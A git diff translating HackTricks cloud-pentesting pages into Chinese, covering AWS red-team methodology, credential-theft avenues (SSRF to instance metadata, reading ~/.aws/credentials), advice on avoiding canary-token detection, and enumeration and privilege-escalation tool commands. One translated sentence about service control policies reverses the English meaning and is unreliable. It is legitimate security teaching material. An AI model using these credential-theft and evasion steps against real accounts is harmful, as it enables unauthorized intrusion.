+- **风险:** 未经授权访问受保护的部署,允许攻击者操纵或部署恶意代码。
+8. **忽视区域故障转移配置**
+- **错误配置:** 未设置被动故障转移区域或错误配置故障转移设置。
+- **风险:** 在主要区域故障期间服务停机,导致可用性降低和潜在的数据不一致。
+9. **超过 VPC 对等连接限制**
+- **错误配置:** 尝试建立超过允许限制的 VPC 对等连接(例如,超过 50 个连接)。
+- **风险:** 无法安全连接必要的后端服务,导致部署失败和操作中断。
+10. **不安全的网络设置**
+- **错误配置:** 弱防火墙规则、缺乏加密或安全计算网络内的不当网络分段。
+- **风险:** 数据拦截、未经授权访问后端服务和增加攻击的脆弱性。
---
-### Environment Variables
+### 环境变量
-**Purpose:** Manage environment-specific variables and secrets used by all the projects.
+**目的:** 管理所有项目使用的特定于环境的变量和秘密。
-#### Security Configurations:
+#### 安全配置:
-- **Exposing Sensitive Variables**
- - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
-- **Sensitive disabled**
- - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **暴露敏感变量**
+- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。
+- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。
+- **敏感禁用**
+- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。
+- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md
index ad71de826..87bde5f7b 100644
--- a/src/pentesting-cloud/aws-security/README.md
+++ b/src/pentesting-cloud/aws-security/README.md
@@ -2,17 +2,17 @@
{{#include ../../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+**在开始对** AWS **环境进行渗透测试之前,您需要了解一些关于AWS工作原理的基本知识,以帮助您理解需要做什么,如何找到错误配置以及如何利用它们。**
-Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
+组织层次结构、IAM和其他基本概念在以下内容中进行了说明:
{{#ref}}
aws-basic-information/
{{#endref}}
-## Labs to learn
+## 学习实验室
- [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat)
- [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable)
@@ -22,49 +22,49 @@ aws-basic-information/
- [http://flaws.cloud/](http://flaws.cloud/)
- [http://flaws2.cloud/](http://flaws2.cloud/)
-Tools to simulate attacks:
+模拟攻击的工具:
- [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/)
- [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main)
-## AWS Pentester/Red Team Methodology
+## AWS 渗透测试者/红队方法论
-In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
+为了审计AWS环境,了解以下内容非常重要:哪些**服务正在使用**,什么**被暴露**,谁对什么有**访问权限**,以及内部AWS服务与**外部服务**是如何连接的。
-From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
+从红队的角度来看,**攻陷AWS环境的第一步**是设法获取一些**凭证**。以下是一些获取凭证的想法:
-- **Leaks** in github (or similar) - OSINT
-- **Social** Engineering
-- **Password** reuse (password leaks)
-- Vulnerabilities in AWS-Hosted Applications
- - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- - **Local File Read**
- - `/home/USERNAME/.aws/credentials`
- - `C:\Users\USERNAME\.aws\credentials`
-- 3rd parties **breached**
-- **Internal** Employee
-- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials
+- **在github(或类似平台)中的泄露** - OSINT
+- **社会工程学**
+- **密码**重用(密码泄露)
+- AWS托管应用程序中的漏洞
+- [**服务器端请求伪造**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf)访问元数据端点
+- **本地文件读取**
+- `/home/USERNAME/.aws/credentials`
+- `C:\Users\USERNAME\.aws\credentials`
+- 第三方**被攻破**
+- **内部**员工
+- [**Cognito**](aws-services/aws-cognito-enum/#cognito)凭证
-Or by **compromising an unauthenticated service** exposed:
+或者通过**攻陷一个未认证的服务**:
{{#ref}}
aws-unauthenticated-enum-access/
{{#endref}}
-Or if you are doing a **review** you could just **ask for credentials** with these roles:
+或者如果您正在进行**审查**,您可以直接**请求凭证**,使用这些角色:
{{#ref}}
aws-permissions-for-a-pentest.md
{{#endref}}
> [!NOTE]
-> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+> 在您成功获取凭证后,您需要知道**这些凭证属于谁**,以及**他们可以访问什么**,因此您需要执行一些基本的枚举:
-## Basic Enumeration
+## 基本枚举
### SSRF
-If you found a SSRF in a machine inside AWS check this page for tricks:
+如果您在AWS内部的机器上发现了SSRF,请查看此页面以获取技巧:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
@@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
### Whoami
-One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
-
+您需要了解的第一件事是您是谁(您所在的账户以及有关AWS环境的其他信息):
```bash
# Easiest way, but might be monitored?
aws sts get-caller-identity
@@ -89,10 +88,9 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
```
-
> [!CAUTION]
-> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
-> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
+> 注意,公司可能会使用 **canary tokens** 来识别 **令牌被盗用和使用** 的情况。在使用令牌之前,建议检查它是否为 canary token。\
+> 更多信息请 [**查看此页面**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass)。
### Org Enumeration
@@ -102,30 +100,30 @@ aws-services/aws-organizations-enum.md
### IAM Enumeration
-If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
+如果您拥有足够的权限,**检查 AWS 账户内每个实体的权限** 将帮助您了解您和其他身份可以做什么,以及如何 **提升权限**。
-If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
-Check **how to do the numeration and brute-forcing** in:
+如果您没有足够的权限来枚举 IAM,您可以 **通过暴力破解来获取** 它们。\
+请查看 **如何进行枚举和暴力破解**:
{{#ref}}
aws-services/aws-iam-enum.md
{{#endref}}
> [!NOTE]
-> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-> In the following section you can check some ways to **enumerate some common services.**
+> 现在您 **已经获得了一些关于您凭据的信息**(如果您是红队,希望您 **没有被检测到**)。是时候找出环境中正在使用哪些服务。\
+> 在以下部分,您可以查看一些 **枚举常见服务** 的方法。
## Services Enumeration, Post-Exploitation & Persistence
-AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
+AWS 拥有惊人的服务数量,在以下页面中,您将找到 **基本信息、枚举** 备忘单\*\*,\*\* 如何 **避免检测**,获取 **持久性**,以及其他 **后期利用** 技巧:
{{#ref}}
aws-services/
{{#endref}}
-Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools).
+请注意,您 **不** 需要 **手动** 执行所有工作,下面的帖子中您可以找到关于 [**自动工具**](./#automated-tools) 的 **部分**。
-Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
+此外,在此阶段,您可能会发现 **更多暴露给未认证用户的服务**,您可能能够利用它们:
{{#ref}}
aws-unauthenticated-enum-access/
@@ -133,7 +131,7 @@ aws-unauthenticated-enum-access/
## Privilege Escalation
-If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
+如果您可以 **检查至少自己的权限** 在不同资源上,您可以 **检查是否能够获得更多权限**。您应该至少关注以下权限:
{{#ref}}
aws-privilege-escalation/
@@ -141,10 +139,10 @@ aws-privilege-escalation/
## Publicly Exposed Services
-While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
-As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+在枚举 AWS 服务时,您可能发现其中一些 **向互联网暴露元素**(虚拟机/容器端口、数据库或队列服务、快照或存储桶...)。\
+作为渗透测试者/红队成员,您应该始终检查是否可以在它们上找到 **敏感信息/漏洞**,因为它们可能为您提供 **进一步访问 AWS 账户** 的机会。
-In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
+在本书中,您应该找到 **关于如何查找暴露的 AWS 服务以及如何检查它们的信息**。关于如何查找 **暴露网络服务中的漏洞**,我建议您 **搜索** 特定的 **服务** 在:
{{#ref}}
https://book.hacktricks.xyz/
@@ -154,52 +152,49 @@ https://book.hacktricks.xyz/
### From the root/management account
-When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
+当管理账户在组织中创建新账户时,会在新账户中创建一个 **新角色**,默认命名为 **`OrganizationAccountAccessRole`**,并给予 **管理账户** 访问新账户的 **AdministratorAccess** 策略。
-So, in order to access as administrator a child account you need:
+因此,要以管理员身份访问子账户,您需要:
-- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
- - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
- - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
-- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
+- **攻陷** **管理** 账户并找到 **子账户的 ID** 和 **角色的名称**(默认是 OrganizationAccountAccessRole),以允许管理账户以管理员身份访问。
+- 要查找子账户,请转到 AWS 控制台中的组织部分或运行 `aws organizations list-accounts`
+- 您无法直接找到角色的名称,因此请检查所有自定义 IAM 策略,并搜索任何允许 **`sts:AssumeRole` 在之前发现的子账户上** 的策略。
+- **攻陷** 管理账户中的 **主体**,并具有 **`sts:AssumeRole` 权限** 在子账户的角色上(即使该账户允许管理账户中的任何人进行冒充,由于这是外部账户,特定的 `sts:AssumeRole` 权限是必要的)。
## Automated Tools
### Recon
-- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
-
+- [**aws-recon**](https://github.com/darkbitio/aws-recon): 一个多线程的 AWS 安全专注的 **库存收集工具**,用 Ruby 编写。
```bash
# Install
gem install aws_recon
# Recon and get json
AWS_PROFILE= aws_recon \
- --services S3,EC2 \
- --regions global,us-east-1,us-east-2 \
- --verbose
+--services S3,EC2 \
+--regions global,us-east-1,us-east-2 \
+--verbose
```
-
-- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
-- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
-
+- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist 是一个 **多云工具,用于获取资产**(主机名,IP 地址)来自云服务提供商。
+- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper 帮助您分析您的亚马逊网络服务(AWS)环境。它现在包含更多功能,包括安全问题的审计。
```bash
# Installation steps in github
# Create a config.json file with the aws info, like:
{
- "accounts": [
- {
- "default": true,
- "id": "",
- "name": "dev"
- }
- ],
- "cidrs":
- {
- "2.2.2.2/28": {"name": "NY Office"}
- }
+"accounts": [
+{
+"default": true,
+"id": "",
+"name": "dev"
+}
+],
+"cidrs":
+{
+"2.2.2.2/28": {"name": "NY Office"}
+}
}
# Enumerate
@@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev
python cloudmapper.py prepare #Prepare webserver
python cloudmapper.py webserver #Show webserver
```
-
-- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
-
+- [**cartography**](https://github.com/lyft/cartography): Cartography 是一个 Python 工具,它将基础设施资产及其之间的关系整合在一个由 Neo4j 数据库驱动的直观图形视图中。
```bash
# Install
pip install cartography
@@ -240,17 +233,15 @@ pip install cartography
# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```
-
-- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
-- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
-- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
+- [**starbase**](https://github.com/JupiterOne/starbase): Starbase 收集来自服务和系统的资产和关系,包括云基础设施、SaaS 应用程序、安全控制等,形成一个直观的图形视图,支持 Neo4j 数据库。
+- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (使用 python2) 这是一个工具,尝试 **发现所有** [**AWS 资源**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) 在一个账户中创建的。
+- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): 这是一个工具,用于 **获取与 AWS 账户关联的所有公共 IP 地址**(包括 IPv4/IPv6)。
### Privesc & Exploiting
-- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
-- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
- - Note that pacu **only checks your own privescs paths** (not account wide).
-
+- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** 发现扫描的 AWS 环境中最特权的用户,包括 AWS Shadow Admins。它使用 powershell。您可以在 [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1) 的 **`Check-PrivilegedPolicy`** 函数中找到 **特权策略的定义**。
+- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu 是一个开源的 **AWS 利用框架**,旨在针对云环境进行攻击性安全测试。它可以 **枚举**、查找 **错误配置** 并 **利用** 它们。您可以在 [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) 的 **`user_escalation_methods`** 字典中找到 **特权权限的定义**。
+- 请注意,pacu **仅检查您自己的 privescs 路径**(而不是账户范围内)。
```bash
# Install
## Feel free to use venvs
@@ -264,9 +255,7 @@ pacu
> exec iam__enum_permissions # Get permissions
> exec iam__privesc_scan # List privileged permissions
```
-
-- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
-
+- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) 是一个脚本和库,用于识别 AWS 账户或 AWS 组织中 AWS 身份和访问管理 (IAM) 配置的风险。它将账户中的不同 IAM 用户和角色建模为有向图,从而能够检查 **权限提升** 和攻击者可能采取的获取 AWS 中资源或操作的替代路径。您可以在 [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) 中检查用于查找 privesc 路径的 **权限**,文件名以 `_edges.py` 结尾。
```bash
# Install
pip install principalmapper
@@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins
pmapper --profile dev orgs create
pmapper --profile dev orgs display
```
-
-- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
- It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
-
+- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining 是一个 AWS IAM 安全评估工具,识别最小权限的违规行为并生成风险优先级的 HTML 报告。\
+它将向您显示潜在的 **过度权限** 客户、内联和 aws **策略** 以及哪些 **主体可以访问它们**。 (它不仅检查权限提升,还检查其他有趣的权限,建议使用)。
```bash
# Install
pip install cloudsplaining
@@ -303,24 +290,20 @@ cloudsplaining download --profile dev
# Analyze the IAM policies
cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
```
+- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack 评估 AWS 账户的 **子域劫持漏洞**,这是由于 Route53 和 CloudFront 配置的解耦造成的。
+- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): 列出 ECR 仓库 -> 拉取 ECR 仓库 -> 后门化 -> 推送后门化镜像
+- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag 是一个工具,**搜索**公共弹性块存储 (**EBS**) 快照中的秘密,这些秘密可能被意外遗留。
-- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
-- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
-- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
-
-### Audit
-
-- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
+### 审计
+- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit 由 Aqua 开发,是一个开源项目,旨在检测云基础设施账户中的 **安全风险**,包括:亚马逊网络服务 (AWS)、微软 Azure、谷歌云平台 (GCP)、甲骨文云基础设施 (OCI) 和 GitHub(它不查找 ShadowAdmins)。
```bash
./index.js --csv=file.csv --console=table --config ./config.js
# Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
## use "cis" for cis level 1 and 2
```
-
-- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
-
+- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler 是一个开源安全工具,用于执行 AWS 安全最佳实践评估、审计、事件响应、持续监控、加固和取证准备。
```bash
# Install python3, jq and git
# Install
@@ -331,15 +314,11 @@ prowler -v
prowler
prowler aws --profile custom-profile [-M csv json json-asff html]
```
-
-- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
-
+- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox 帮助您在不熟悉的云环境中获得情境意识。它是一个开源命令行工具,旨在帮助渗透测试人员和其他进攻性安全专业人员在云基础设施中找到可利用的攻击路径。
```bash
cloudfox aws --profile [profile-name] all-checks
```
-
-- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
-
+- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite 是一个开源的多云安全审计工具,能够对云环境进行安全态势评估。
```bash
# Install
virtualenv -p python3 venv
@@ -350,18 +329,16 @@ scout --help
# Get info
scout aws -p dev
```
+- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): 云安全套件 (使用 python2.7,似乎未维护)
+- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus 是一个强大的工具,用于 AWS EC2 / S3 / CloudTrail / CloudWatch / KMS 最佳加固实践 (似乎未维护)。它仅检查系统内默认配置的凭据。
-- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
-- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
+### 持续审计
-### Constant Audit
-
-- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
-- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
-- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
-
-## DEBUG: Capture AWS cli requests
+- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian 是一个用于管理公共云账户和资源的规则引擎。它允许用户 **定义策略以启用良好管理的云基础设施**,既安全又成本优化。它将组织中许多临时脚本整合为一个轻量级和灵活的工具,具有统一的指标和报告。
+- [**pacbot**](https://github.com/tmobile/pacbot)**: 代码即政策机器人 (PacBot)** 是一个用于 **持续合规监控、合规报告和云安全自动化** 的平台。在 PacBot 中,安全和合规政策以代码形式实现。PacBot 发现的所有资源都根据这些政策进行评估,以衡量政策符合性。PacBot **自动修复** 框架提供了通过采取预定义措施自动响应政策违规的能力。
+- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert 是一个无服务器的 **实时** 数据分析框架,使您能够 **摄取、分析和警报** 来自任何环境的数据,**使用您定义的数据源和警报逻辑**。计算机安全团队使用 StreamAlert 每天扫描数 TB 的日志数据以进行事件检测和响应。
+## DEBUG: 捕获 AWS cli 请求
```bash
# Set proxy
export HTTP_PROXY=http://localhost:8080
@@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem
# Run aws cli normally trusting burp cert
aws ...
```
-
-## References
+## 参考
- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
index 02e6e7729..2b318a3ca 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -1,331 +1,315 @@
-# AWS - Basic Information
+# AWS - 基本信息
{{#include ../../../banners/hacktricks-training.md}}
-## Organization Hierarchy
+## 组织层级
.png>)
-### Accounts
+### 账户
-In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
+在 AWS 中有一个 **根账户,** 它是您 **组织中所有账户的父容器**。然而,您不需要使用该账户来部署资源,您可以创建 **其他账户以将不同的 AWS** 基础设施分开。
-This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
+从 **安全** 的角度来看,这非常有趣,因为 **一个账户无法访问其他账户的资源**(除非专门创建了桥接),因此您可以在部署之间创建边界。
-Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
+因此,在一个组织中有 **两种类型的账户**(我们谈论的是 AWS 账户,而不是用户账户):一个被指定为管理账户的单一账户,以及一个或多个成员账户。
-- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
+- **管理账户(根账户)** 是您用来创建组织的账户。从组织的管理账户,您可以执行以下操作:
- - Create accounts in the organization
- - Invite other existing accounts to the organization
- - Remove accounts from the organization
- - Manage invitations
- - Apply policies to entities (roots, OUs, or accounts) within the organization
- - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
- - It's possible to login as the root user using the email and password used to create this root account/organization.
+- 在组织中创建账户
+- 邀请其他现有账户加入组织
+- 从组织中移除账户
+- 管理邀请
+- 对组织内的实体(根、OU 或账户)应用政策
+- 启用与支持的 AWS 服务的集成,以在组织中的所有账户之间提供服务功能。
+- 可以使用用于创建此根账户/组织的电子邮件和密码以根用户身份登录。
- The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
-
-- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
- - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
+管理账户具有 **付款账户的责任**,并负责支付所有由成员账户产生的费用。您无法更改组织的管理账户。
+- **成员账户** 组成了组织中所有其他账户。一个账户一次只能是一个组织的成员。您可以将政策附加到一个账户,以仅对该账户应用控制。
+- 成员账户 **必须使用有效的电子邮件地址**,并可以有一个 **名称**,通常他们将无法管理账单(但可能会被授予访问权限)。
```
aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
```
+### **组织单位**
-### **Organization Units**
-
-Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
-
+账户可以被分组为 **组织单位 (OU)**。通过这种方式,您可以为组织单位创建 **策略**,这些策略将 **应用于所有子账户**。请注意,一个 OU 可以有其他 OU 作为子单位。
```bash
# You can get the root id from aws organizations list-roots
aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
```
-
### Service Control Policy (SCP)
-A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
+一个 **服务控制策略 (SCP)** 是一种策略,指定用户和角色在受 SCP 影响的账户中可以使用的服务和操作。SCP **类似于 IAM** 权限策略,但它们 **不授予任何权限**。相反,SCP 指定了组织、组织单位 (OU) 或账户的 **最大权限**。当您将 SCP 附加到您的组织根或 OU 时,**SCP 限制成员账户中实体的权限**。
-This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
-The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
+这是 **即使是根用户也无法被阻止** 执行某些操作的唯一方法。例如,它可以用于阻止用户禁用 CloudTrail 或删除备份。\
